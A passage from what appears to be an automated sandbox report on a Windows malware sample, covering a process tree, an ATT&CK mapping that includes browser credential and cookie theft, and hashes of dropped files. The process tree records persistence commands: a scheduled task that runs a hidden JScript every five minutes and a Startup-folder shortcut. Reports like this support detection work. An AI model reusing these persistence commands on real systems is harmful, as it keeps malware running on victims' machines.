    "C:\Users\Admin\AppData\Local\Temp\a\1374_2790.exe"
    3⤵
    PID:5304
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
      4⤵
      PID:9020
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5304 -s 152
      4⤵
      Program crash
      PID:8284
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /0
  2⤵
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3960
- C:\Users\Admin\AppData\Local\Temp\E1EF.tmp.exe
  C:\Users\Admin\AppData\Local\Temp\E1EF.tmp.exe
  2⤵
  - Executes dropped EXE
  PID:2608
- - C:\Users\Admin\AppData\Local\Temp\E1EF.tmp.exe
    C:\Users\Admin\AppData\Local\Temp\E1EF.tmp.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:6040
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /0
  2⤵
  PID:2364
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /0
  2⤵
  PID:5984
- C:\Users\Admin\AppData\Local\Temp\DD96.tmp.exe
  C:\Users\Admin\AppData\Local\Temp\DD96.tmp.exe
  2⤵
  PID:7912
- - C:\Windows\SysWOW64\NETSTAT.EXE
    "C:\Windows\SysWOW64\NETSTAT.EXE"
    3⤵
    - Gathers network information
    PID:1572
  - - C:\Program Files\Mozilla Firefox\Firefox.exe
      "C:\Program Files\Mozilla Firefox\Firefox.exe"
      4⤵
      PID:6936
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /0
  2⤵
  PID:1792
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /0
  2⤵
  PID:7772
- - C:\Windows\SysWOW64\runonce.exe
    "C:\Windows\SysWOW64\runonce.exe"
    3⤵
    PID:2636
- - C:\Windows\SysWOW64\runonce.exe
    "C:\Windows\SysWOW64\runonce.exe"
    3⤵
    PID:2016
  - - C:\Program Files\Mozilla Firefox\Firefox.exe
      "C:\Program Files\Mozilla Firefox\Firefox.exe"
      4⤵
      PID:724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c schtasks.exe /create /tn "Appear" /tr "wscript //B 'C:\Users\Admin\AppData\Local\InfoLink Dynamics\InfoForge.js'" /sc minute /mo 5 /F
  2⤵
  PID:2312
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /create /tn "Appear" /tr "wscript //B 'C:\Users\Admin\AppData\Local\InfoLink Dynamics\InfoForge.js'" /sc minute /mo 5 /F
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:388
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InfoForge.url" & echo URL="C:\Users\Admin\AppData\Local\InfoLink Dynamics\InfoForge.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InfoForge.url" & exit
  2⤵
  PID:3136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=5564,i,1678230212308367374,16198277103294615511,262144 --variations-seed-version --mojo-platform-channel-handle=3344 /prefetch:14
1⤵
PID:3372

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDIzRDI5N0MtNTZCMC00NTUxLTkyRkMtM0ZGRjI1ODIxOUEzfSIgdXNlcmlkPSJ7MjExMkUxNzAtQjYzOS00RENELTlEQjAtRUUyN0RDRjdBRThDfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7QzYwRjk0QkItNDFGMC00RTk3LUJDNTctNEFBQUU3N0NFOTM3fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjEiIGluc3RhbGxkYXRldGltZT0iMTczODk1NTM0NSIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNDI3OTQzMzU2MDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUzNTQyODQzNTQiLz48L2FwcD48L3JlcXVlc3Q-
1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:5548

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5440

C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5332" "1264" "1156" "1260" "0" "0" "0" "0" "0" "0" "0" "0"
1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
PID:4708

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDIzRDI5N0MtNTZCMC00NTUxLTkyRkMtM0ZGRjI1ODIxOUEzfSIgdXNlcmlkPSJ7MjExMkUxNzAtQjYzOS00RENELTlEQjAtRUUyN0RDRjdBRThDfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9Ins0OTY5QUI3NS0xQzI3LTQzODMtOTU4Mi0zODgzMEE0QjMzNEZ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtWUFFvUDFGK2ZxMTV3UnpoMWtQTDRQTXBXaDhPUk1CNWl6dnJPQy9jaGpRPSZxdW90OyIvPjxhcHAgYXBwaWQ9Ins1NkVCMThGOC1CMDA4LTRDQkQtQjZEMi04Qzk3RkU3RTkwNjJ9IiB2ZXJzaW9uPSIxMzIuMC4yOTU3LjE0MCIgbmV4dHZlcnNpb249IiIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjEiIGluc3RhbGxkYXRldGltZT0iMTczODk1NDg2MCI-PGV2ZW50IGV2ZW50dHlwZT0iMzIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjQiIHN5c3RlbV91cHRpbWVfdGlja3M9IjU0ODAyOTYxNTQiLz48L2FwcD48L3JlcXVlc3Q-
1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2576

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDIzRDI5N0MtNTZCMC00NTUxLTkyRkMtM0ZGRjI1ODIxOUEzfSIgdXNlcmlkPSJ7MjExMkUxNzAtQjYzOS00RENELTlEQjAtRUUyN0RDRjdBRThDfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9Ins3QjA0OTg2Ri1DNjFFLTREMTUtOUY3NC1CNzUyMzA2NTg5NDN9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtWUFFvUDFGK2ZxMTV3UnpoMWtQTDRQTXBXaDhPUk1CNWl6dnJPQy9jaGpRPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTk1LjQzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMSIgY29ob3J0PSJycmZAMC45NCI-PHVwZGF0ZWNoZWNrLz48cGluZyByPSIyIiByZD0iNjYxMiIgcGluZ19mcmVzaG5lc3M9Ins3MUVFRkRENy0zNTlBLTREOEQtQkNGNC04RkRCMDAzREZCREF9Ii8-PC9hcHA-PGFwcCBhcHBpZD0iezU2RUIxOEY4LUIwMDgtNENCRC1CNkQyLThDOTdGRTdFOTA2Mn0iIHZlcnNpb249IjEzMi4wLjI5NTcuMTQwIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9IjEiIGNvaG9ydD0icnJmQDAuOTYiIG9vYmVfaW5zdGFsbF90aW1lPSIxODQ0Njc0NDA3MzcwOTU1MTYwNiIgdXBkYXRlX2NvdW50PSIxIiBsYXN0X2xhdW5jaF9jb3VudD0iMSIgbGFzdF9sYXVuY2hfdGltZT0iMTMzODM0MzAzMTc5MTI1NzUwIj48dXBkYXRlY2hlY2svPjxwaW5nIGFjdGl2ZT0iMSIgYT0iMiIgcj0iMiIgYWQ9IjY2MTIiIHJkPSI2NjEyIiBwaW5nX2ZyZXNobmVzcz0iezk2RkY3RjA4LTIwQTQtNDM3NS04MzNDLUIyMDBFQURERUNGNn0iLz48L2FwcD48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iMTMyLjAuMjk1Ny4xNDAiIG5leHR2ZXJzaW9uPSIiIGxhbmc9IiIgYnJhbmQ9IklOQlgiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxIiBjb2hvcnQ9InJyZkAwLjUzIiB1cGRhdGVfY291bnQ9IjEiPjx1cGRhdGVjaGVjay8-PHBpbmcgcj0iMiIgcmQ9IjY2MTIiIHBpbmdfZnJlc2huZXNzPSJ7MkI1Qjg0NDktMDIxQS00QTc3LTlDNEUtNzMzNDNDM0Q3QjI1fSIvPjwvYXBwPjwvcmVxdWVzdD4
1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:2344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5288 -ip 5288
1⤵
PID:780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6284 -ip 6284
1⤵
PID:7520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 7892 -ip 7892
1⤵
PID:2796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 7740 -ip 7740
1⤵
PID:7712

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:7900

C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\elevation_service.exe"
1⤵
PID:920

C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\elevation_service.exe"
1⤵
PID:6436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 7480 -ip 7480
1⤵
PID:5444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6220 -ip 6220
1⤵
PID:6688

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2616

C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\elevation_service.exe"
1⤵
PID:7996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 1608 -ip 1608
1⤵
PID:800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5304 -ip 5304
1⤵
PID:5880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

Network Share Connection Removal

T1070.005

Modify Authentication Process

T1556

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\IMG001.exe:P

Filesize
6B

MD5
9fc3796ee0d2bb42d79fe1b5ce106122

SHA1
d15d023df3c9ee8d1306488308f20bb571e5b89c

SHA256
41fdbb429f5f3a0c95ab831c845b5102a7d64762d6b4b8aebea8ff764183ddd4

SHA512
34fee1699f6be54eb867bd8f208c9b003ec57754236caf8d355e5be508d3e2003606c2b29ca60760b97848fda499bb13ae8656901365bfad2dcacf367c009c21

Download Submit
C:\ProgramData\7ymoh\f3wl6x

Filesize
160KB

MD5
f310cf1ff562ae14449e0167a3e1fe46

SHA1
85c58afa9049467031c6c2b17f5c12ca73bb2788

SHA256
e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

SHA512
1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

Download Submit
C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

Filesize
380KB

MD5
beeb8e7e3514f3c362dc6618f50d9f6a

SHA1
6d0570a815c3d4078eb446a9a076ee203566b43a

SHA256
2e1a7e7a7321071ccd4379fbc4afe72cd81d49a61633b4124e65e85127e00e95

SHA512
3d327d316cde650e7ae10a625653c952533f378581bf0287511963e3e3bc575cc4cb88ff107c1481f143e4df7cf8c1b39b7118956b6ca505fe1f8f31846e088a

Download Submit
C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

Filesize
404KB

MD5
96e46f79ebafabc0e6635daa18600c83

SHA1
eeba910305d118bf09a46d42c0502254da93aa26

SHA256
0c37d1e1e8db9d6975f8572325b23acbdea657c4f4ca133b64de469fd57daa0c

SHA512
3452b1b41f53678fb0b344d37d618a18cfe8af0b51cbae0afa567d723045bedb3812809a88a77b19c2755ab29b2d5bd82691f028647df7b5686935ec949e075a

Download Submit
C:\ProgramData\va1ng\5pzmop

Filesize
96KB

MD5
40f3eb83cc9d4cdb0ad82bd5ff2fb824

SHA1
d6582ba879235049134fa9a351ca8f0f785d8835

SHA256
cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0

SHA512
cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

Download Submit
C:\ProgramData\va1ng\b1n7gv

Filesize
288KB

MD5
6a103b7c8ed28ef447ab79600faebce5

SHA1
4affc6efe163f8cd9daea3b28ebbc93d068faf5b

SHA256
9832dd72b382a489f8a07682d7f4e75fe0ea8f7906f2bdb91ac28d34cc4998db

SHA512
1c3020907951da532b28df6642521160a984ef7518acda389628be26e63a5f5e95e5ce36a95953d33e565793c55da32e83bf9d4738f3dad8021299d368fd6f5e

Download Submit
C:\ProgramData\va1ng\cjeuk6

Filesize
10KB

MD5
99d686499432ee2521816511a8bd47a0

SHA1
a1b8e9628a35517d401011ee1dacef5f720487d9

SHA256
c50b448b67adb18d186b16d10908916aee24cf66e811e863f468d0b5e3a6e233

SHA512
467c5339254d4c1f4ded1d313a23bbc8c23fcc13f9aa5d3153f68c7538ca2f46146eaf7bb24e2dae7adc638afabf5e74caa3e142a4463773a672e4248264c05a

Download Submit
C:\ProgramData\va1ng\lng4w4

Filesize
64KB

MD5
9dc7dbee0a621d76a8d30acfdf2a475c

SHA1
adf11749ca09fd0393458e4465f72e93bfdcdfde

SHA256
54fce18b8aea01efa7b7e017fb996d89c7848594a3b38c4029d78f564e436bab

SHA512
001bbb16fb5268fe6d228ff940d6847b340a2a009cc2a7689fd373156a482ffd1ebc4e03be3ab3f6c76c869c02468fb3cc6d9fe271db873b7193f1e70c508412

Download Submit
C:\ProgramData\va1ng\s0h4wl

Filesize
512KB

MD5
59071590099d21dd439896592338bf95

SHA1
6a521e1d2a632c26e53b83d2cc4b0edecfc1e68c

SHA256
07854d2fef297a06ba81685e660c332de36d5d18d546927d30daad6d7fda1541

SHA512
eedb6cadbceb2c991fc6f68dccb80463b3f660c5358acd7d705398ae2e3df2b4327f0f6c6746486848bd2992b379776483a98063ae96edb45877bb0314874668

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
47229e6032b19a1609b315e5c9b6b8ef

SHA1
be33f2d5980c47ef4c1ce6bdb376182d85179398

SHA256
23b6d05b65cc304fe46df21b56f1453d03901fef97c6d5b38c10f24361d25a7f

SHA512
91ca6d4c84095a7381cc1bf33a501a710d440224994496e03c8b57647ee2968b9fd919d3ddd6c87eed56d2a6631ec8ce993bbbc1a3ab9da952be632de85825ef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\3625f9f9-7408-4cf7-979b-9dd6c44787db.tmp

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
73dc2386e1dd98924bdf1a38f1f5ac45

SHA1
854776226a0e6787f43ff1a04321f8c338049bc6

SHA256
3c3a60f0320239c74b254bdb6e9c16a03a5fee357376682a8e493ddcf0d8a291

SHA512
051bed5882533f116ce7e62ea6ab30e46662496dac8d689eeaf1eab803a70a47d3e5ea3ec59f49c0bfbbfd66455f3f764fee206b1c3f7e3ad58e1a13ea96d6a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
ad778f7dba744e902c25a506c3490d30

SHA1
f126a0afb7bcee1f9af0418acffc260b75f22cf5

SHA256
9477f044f991031ffde3baea866867986da92e080e53a54f20a1f5d46da7d5fa

SHA512
c9c6b6a259fa3154592152c7d6e680f98bebb21da88b2428e103b42f038bf0405340284bc45ce6c3d4ec65d31bac2953405f576b86478a3e3aea12d248e314f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
4b0b2c1429ed0649aec1983a03c64e63

SHA1
9273f76f5550a97c258b0608abff893f6bfada42

SHA256
26b1438cbcbf9fc66ed4f13be18bcded083a4cb89e6d3a275ad44e16816b0838

SHA512
1324d3eecc20ba611a08d495973e1e910bc722a51e255f43a11649bfb317b16bd41aa43be64b171a5d62ea6808bf623d11856cd0d93e64af416d8f8f047e9368

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
e1d271a01fc2474a35887b41c8e06d56

SHA1
e3902437e470894a36d86c6c0e822de85b4d77dc

SHA256
f54252ca540a17c1e0bf95e3f2ab100286c57d7de99362ef4c72594405122745

SHA512
2a873823287d0d4b9b1025882b523dc2ec5681c27c1689bf97f47b70aa91e86a14893685ccc5809dded89ee81946946847212182d7fdecc072903c8887ce07f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\2a7573b0-20cf-4fbc-8283-7958b1c3357a.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
43KB

MD5
5e4b61080aa561bb0ed8ebb178117382

SHA1
360a85e0e51e823e222fe7deadcc80193def6e70

SHA256
18ced727661743a454f904593e685eb110fb86a9c7b1296b4c2a68aefb35235c

SHA512
293f5a18645adbdabac58fa91b878d5724803d06510c732b999fcaeffc704765a7c489e22a660888f8b7654676fa5c686b6c4f7ee7d535e956ac8d5889c1db86

Download Submit
C:\Users\Admin\AppData\Local\Old Data Eraser 5.14.7.1119\olddataeraser19.exe

Filesize
6.5MB

MD5
c9f7a42f057299f92d58d027751ab2ed

SHA1
85662e56b8649223d25fde3fe70de2cbe4ec503d

SHA256
a9ec7ff4a779c7acd1284f6d1e8698a74ece2d9a3e70a7226b69ebd817f6eb32

SHA512
fd6496006fef94496dc1b2f610da838c8187215bb4beb249054f93ef1da69dd6ce4384d5f633e2a14d6057458348fda373e5f0492cba7a4b522047d7d12a0c13

Download Submit
C:\Users\Admin\AppData\Local\Old Data Eraser 5.14.7.1119\sqlite3.dll

Filesize
630KB

MD5
e477a96c8f2b18d6b5c27bde49c990bf

SHA1
e980c9bf41330d1e5bd04556db4646a0210f7409

SHA256
16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

SHA512
335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

Download Submit
C:\Users\Admin\AppData\Local\Temp\342497-3

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\342497-3

Filesize
114KB

MD5
4e94dd264b0f6a9f10dffe79fd5bbacf

SHA1
8fcc4f67d18cec7d92a29b7562428d7c7f380d83

SHA256
b25924c4b44de1c7cc629a7b61f4ea1435379374793ebf991b26997a7c78755b

SHA512
fcad8866056bf774f9b1ac7eb1762c83bbb5f103ff9636d4e88ffe51a57c98ed10ab07df895ed1cc90373606bb8e6061c62c80a2b2043b0213de63466b6a8349

Download Submit
C:\Users\Admin\AppData\Local\Temp\342497-3

Filesize
114KB

MD5
4f00ef633c62bf0f71e2deecd9c93741

SHA1
d1f57c5a93eaf37d3bfe62441aaa10faf1955243

SHA256
4cae7fd00f55008ef32a4d41ba684e8278860834847439eb67af0904fc6efd55

SHA512
7211049323a6b6e056bed468a61aa3eb863d3aa6b3f9e6338f3f2ce251ae03042735ae4ca1625316462fb39a1707ddb86a174cdbbbcdd6b56fe10bac2c1101ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\DZLnFCM00C.tmp

Filesize
20KB

MD5
c29f3580c56a14c8e6b36d42aeeed7fe

SHA1
bbdb71bf7ae2f483c54810edd581cb4e43715d97

SHA256
